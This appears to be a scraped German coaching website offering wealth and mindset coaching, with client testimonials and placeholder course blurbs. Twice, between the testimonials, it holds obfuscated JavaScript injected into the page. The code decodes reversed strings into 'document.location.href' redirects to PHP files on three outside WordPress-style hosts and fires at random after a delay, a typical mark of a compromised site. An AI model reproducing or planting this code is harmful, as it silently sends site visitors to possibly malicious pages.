Dein Weg zum Wohlstand

Entscheide Dich für (mehr) Wohlstand
Dein Wohlstand und Dein Glück warten bereits auf Dich. Mache Dich auf Deinen Weg.
1
Vereinbare ein Erstgespräch mit mir
Ich stehe Dir sehr gerne für ein unverbindliches und kostenfreies Erstgespräch zur Verfügung, so dass Du mich, wir uns, kennenlernen können.
2
Buche ein Coachingpaket Deiner Wahl
Meine Angebote findest Du im Reiter Coaching.
3
Ich begleite Dich. Schritt für Schritt.
Als Dein Coach werde ich Dich Schritt für Schritt auf Deinem Weg zu Deinem Ziel begleiten.
4
Transformation abgeschlossen
Herzlichen Glückwunsch zu Deinem glücklichen Leben. Genieße Dein geländegängiges Mindset, Deine neuen finanziellen Freiheiten und somit Dein persönliches Glück als Ergebnis Deiner Arbeit. Sei stolz auf Dich und Deinen Weg, den Du bis hierher gegangen bist!
5

Die Zusammenarbeit mit mir zeichnet sich aus durch:

Präzise Auftragsklärung

Hier stelle ich sicher, dass wir Dein Ziel immer fest im Blick haben. Die präzise Auftragsklärung ermöglicht mir für Dich individuell zugeschnittene Arbeitspakete zu erstellen.

Fach- und Handlungskompetenz

Profitiere von meinen zahlreichen Aus- und Weiterbildungen sowie meinen fast 20 Jahren Berufserfahrung. Erfahre mehr auf 'Über mich'.

Individuelle Arbeitspakete

Meine Arbeitspakte zeichnen sich durch Effizienz und Praktikabilität aus und sind für Dich mit geringen Zeitaufwand in Deinen Alltag integrierbar.

Größtmögliche Effizienz

Ich werde Dich in unseren virtuellen Terminen, persöhnlich eng begleiten und damit sicherstellen, dass Du Deine gesteckten Meilensteine auf dem Weg zum Endziel erreicht wirst.

Ich kann Dir NICHT helfen, ...

  • Deinen Weg zu gehen. Das kannst nur Du. Ich unterstütze Dich von Herzen gerne, indem ich Dir mein Wissen, meine Erfahrungen und meine Kompetenz zur Verfügung stelle und Dir mit Rat und Tat zur Seite stehe – genau dann, wenn Du Dir einen Coach als starken Partner an Deiner Seite wünschst
  • Dir Deine zukünftigen Sorgen, Zweifel, Nöte und nicht hilfreiche Gedanken abzunehmen – das kann niemand; aber ich kann Dir zeigen, wie Du mit ihnen umgehen kannst

     

Ich kann Dir helfen, ...

  • Deine Erfolgsverhinderer wie z.B. Glaubenssätzen und veraltete Denk- und Verhaltensmustern aufzudecken, aufzulösen und in ein geländegängiges Mindset umzuwandeln
  • Dein volles Potential zu erkennen und zu entfalten
  • Dein Mangelgefühl in ein Gefühl der Fülle umzuwandeln
  • eine Struktur in Deine Finanzen zu bringen, um eine Grundlage für Deine finanzielle Freiheit schaffen
  • Deinen monatlichen Cash-Flow zu erhöhen
  • uvm.

Meine Coachings

Das biete ich dir

1:1 Coaching

Entdecke hier meine 1:1 Coaching Angebote. Egal ob individuelle Einzelsitzung oder perfekt zugeschnittenes Coachingpaket. Hier ist für jeden etwas dabei. Ich freu mich auf Dich.

Gruppencoachings

Nutze gezielt die Vorteile des Gruppencoachings für Dich. Du profitierst gleich mehrfach: von hochwertigen Inhalten, den Kostenvorteilen, uvm. Sei gespannt.

Unternehmens-Coaching

Eine Win-Win Situation für Unternehmen und Mitarbeiter schaffen. Mit wohlhabende Menschen die Produktivität und somit die Unternehmensgewinne steigern.

Meine Kurse

Kurs 1

Kurs 1

Learn How To Build The Perfect Diet & Meal Plan For Improved Health, Better Weight Loss And More Muscle Gains…
Kurs 2

Kurs 2

Learn How To Build The Perfect Diet & Meal Plan For Improved Health, Better Weight Loss And More Muscle Gains…
Kurs 3

Kurs 3

Are you new to PHP or need a refresher? Then this course will help you get all the fundamentals of…

Erfolge meiner Kunden

Nini (1)
"Ich entscheide mich dafür, mein Geld selbst in die Hand zu nehmen!" Ich kann mich gar nicht genug bedanken für deine Hilfe beim Entdecken meiner limitierenden Glaubenssätze. Heute stehe ich für meine (auch finanziellen) Ziele und erschaffe mir das Leben, das ich mir immer gewünscht habe. Auch wenn das nicht immer leicht ist, weiß ich jetzt, dass alleine ich der Faktor bin, der etwas verändern kann. Sehr gut hat mir auch Dein „Ab in die finanzielle Freiheit“ Modell gefallen. Super Tool. Damit kann ich wirklich (und jeder andere, der sich finanziell strukturierter aufstellen möchte) etwas anfangen. Jetzt mache auch ich mein Geld zu meinem Mitarbeiter und lasse es für mich arbeiten ;). Du machst eine wundervolle Arbeit und ich bin sehr dankbar für unsere gemeinsamen Coachings! DANKE"
Denise
Beraterin
$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom
"Vielen Dank noch einmal für das Coaching am Sonntag. Ich habe gestern noch viel über unsere erarbeiteten Punkte und Deine Impulse nachgedacht und möchte Dir sagen, dass es mir sehr viel gebracht hat. Die erarbeiteten Punkte und die nächsten Schritte so gebündelt herausgearbeitet zu haben war für mich genau das Richtige. DANKE! Ich habe schon das eine oder andere Coaching in dieser Form in meinem Leben gehabt, aber die Art und Weise, wie Du mich durch die Session geführt hast, war unglaublich gut. Durch Deine empathische Art hatte ich zu jeder Zeit das Gefühl, dass ich bei Dir sehr gut aufgehoben bin und dass ich einen großen Schritt voran gekommen bin. Vielen Dank für diese tolle Erfahrung."
Tom
Abteilungsleiter
Oliver
"Ich konnte mir in unserer Sitzung meiner bisherigen Glaubenssätzen bewusst werden und endlich mal spüren woher der Druck und meine Angst stammen. Nach sehr langer Zeit habe ich meine Emotionen und meinen Körper wieder richtig wahrnehmen können. Durch das Treffen einer neuen kraftvolle Entscheidung für meine Zukunft konnte ich mein Lebensmotto „ Das Leben ist leicht“ in mein Leben integrieren, seitdem kann ich jeden Tag mehr genießen und das Leben sowie die Herausforderungen mit Leichtigkeit und Freude angehen. Ich bin so dankbar für das Coaching mit Dir, Caro! Es war der absolute Knaller! "
Oliver
Controller
veronika
"Liebe Caro, Du hast eine wunderbare liebevolle, emphatische Art mich abzuholen und mich eng durch die Coachingsession zu begleiten. Es ist eine Reise wo man verdrängte Emotionen liebevoll wieder nach Hause holen kann, die sich hinter Körperempfindungen oder auch Symptomen versteckt halten, dessen Ursprung vielfach schon in der Kindheit gelegt wurde. Es ist ein wunderbares Erlebnis, wenn ich meine alten Muster, Glaubenssätze und Mauern erkennen, diese auflösen und dadurch in unseren Coachings zu neuen Entscheidungen gelange, und mit neuer Energie in die Zukunft gehen kann. Du bist für mich ein wunderbarer Coach."
Veronika
Erzieherin
anja
"Caro, was soll ich sagen. Ich bin immer noch fasziniert, mit wie viel Begeisterung Du mir das Thema „Aufbau finanzieller Strukturen“ näher gebracht hast. Dazu ist es ein wunderbares Gefühl, seine (finanziellen) Glaubenssätze aufgedeckt und kennengelernt zu haben, um daran gezielt arbeiten zu können. Durch Dich habe ich erfahren, dass Geldverdienen nicht hart sein muss. Dafür und für die neuen Strukturen in meinen Finanzen möchte ich Dir von Herzen danken. Du hast recht … Wohlstand beginnt im Kopf. 😊"
Anja
Vertriebsassistentin
Nini (1)
"Ich entscheide mich dafür, mein Geld selbst in die Hand zu nehmen!" Ich kann mich gar nicht genug bedanken für deine Hilfe beim Entdecken meiner limitierenden Glaubenssätze. Heute stehe ich für meine (auch finanziellen) Ziele und erschaffe mir das Leben, das ich mir immer gewünscht habe. Auch wenn das nicht immer leicht ist, weiß ich jetzt, dass alleine ich der Faktor bin, der etwas verändern kann. Sehr gut hat mir auch Dein „Ab in die finanzielle Freiheit“ Modell gefallen. Super Tool. Damit kann ich wirklich (und jeder andere, der sich finanziell strukturierter aufstellen möchte) etwas anfangen. Jetzt mache auch ich mein Geld zu meinem Mitarbeiter und lasse es für mich arbeiten ;). Du machst eine wundervolle Arbeit und ich bin sehr dankbar für unsere gemeinsamen Coachings! DANKE"
Denise
Beraterin
$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom
"Vielen Dank noch einmal für das Coaching am Sonntag. Ich habe gestern noch viel über unsere erarbeiteten Punkte und Deine Impulse nachgedacht und möchte Dir sagen, dass es mir sehr viel gebracht hat. Die erarbeiteten Punkte und die nächsten Schritte so gebündelt herausgearbeitet zu haben war für mich genau das Richtige. DANKE! Ich habe schon das eine oder andere Coaching in dieser Form in meinem Leben gehabt, aber die Art und Weise, wie Du mich durch die Session geführt hast, war unglaublich gut. Durch Deine empathische Art hatte ich zu jeder Zeit das Gefühl, dass ich bei Dir sehr gut aufgehoben bin und dass ich einen großen Schritt voran gekommen bin. Vielen Dank für diese tolle Erfahrung."
Tom
Abteilungsleiter
Oliver
"Ich konnte mir in unserer Sitzung meiner bisherigen Glaubenssätzen bewusst werden und endlich mal spüren woher der Druck und meine Angst stammen. Nach sehr langer Zeit habe ich meine Emotionen und meinen Körper wieder richtig wahrnehmen können. Durch das Treffen einer neuen kraftvolle Entscheidung für meine Zukunft konnte ich mein Lebensmotto „ Das Leben ist leicht“ in mein Leben integrieren, seitdem kann ich jeden Tag mehr genießen und das Leben sowie die Herausforderungen mit Leichtigkeit und Freude angehen. Ich bin so dankbar für das Coaching mit Dir, Caro! Es war der absolute Knaller! "
Oliver
Controller
veronika
"Liebe Caro, Du hast eine wunderbare liebevolle, emphatische Art mich abzuholen und mich eng durch die Coachingsession zu begleiten. Es ist eine Reise wo man verdrängte Emotionen liebevoll wieder nach Hause holen kann, die sich hinter Körperempfindungen oder auch Symptomen versteckt halten, dessen Ursprung vielfach schon in der Kindheit gelegt wurde. Es ist ein wunderbares Erlebnis, wenn ich meine alten Muster, Glaubenssätze und Mauern erkennen, diese auflösen und dadurch in unseren Coachings zu neuen Entscheidungen gelange, und mit neuer Energie in die Zukunft gehen kann. Du bist für mich ein wunderbarer Coach."
Veronika
Erzieherin
anja
"Caro, was soll ich sagen. Ich bin immer noch fasziniert, mit wie viel Begeisterung Du mir das Thema „Aufbau finanzieller Strukturen“ näher gebracht hast. Dazu ist es ein wunderbares Gefühl, seine (finanziellen) Glaubenssätze aufgedeckt und kennengelernt zu haben, um daran gezielt arbeiten zu können. Durch Dich habe ich erfahren, dass Geldverdienen nicht hart sein muss. Dafür und für die neuen Strukturen in meinen Finanzen möchte ich Dir von Herzen danken. Du hast recht … Wohlstand beginnt im Kopf. 😊"
Anja
Vertriebsassistentin

Soziales Engagement und Soziale Verantwortung:

Je mehr Geld ich verdiene, umso mehr Gutes kann ich tun.

Mein Coaching steht nicht nur in Sachen Persönlichkeitsentwicklung und dem Aufbau von finanziellen Strukturen für Nachhaltigkeit, sondern auch für soziales Engagement und soziale Verantwortung. Hier liegt es mir sehr am Herzen Menschen unter die Arme zu greifen die nicht so viel Glück in ihrem Leben haben. Deshalb werde ich für jedes zehnte verkaufte Coachingpaket eine Jahrespartnerschaft für ein Kind aus einem Entwicklungsland übernehmen. Weiter wichtig ist mir die Verantwortung gegenüber unserer Umwelt, unserer Erde, unserem Zuhause. Um dem Klimawandel den Kampf anzusagen, werde ich für jedes zwanzigste verkaufte Einzelcoaching einen Baum pflanzen lassen. Mit einem Coaching bei mir übernimmst Du gleichzeitig für Dich, für hilfsbedürftige Kinder und unsere Umwelt Verantwortung. 

Leitfaden für Gehaltsverhandlungen hier kostenfrei sichern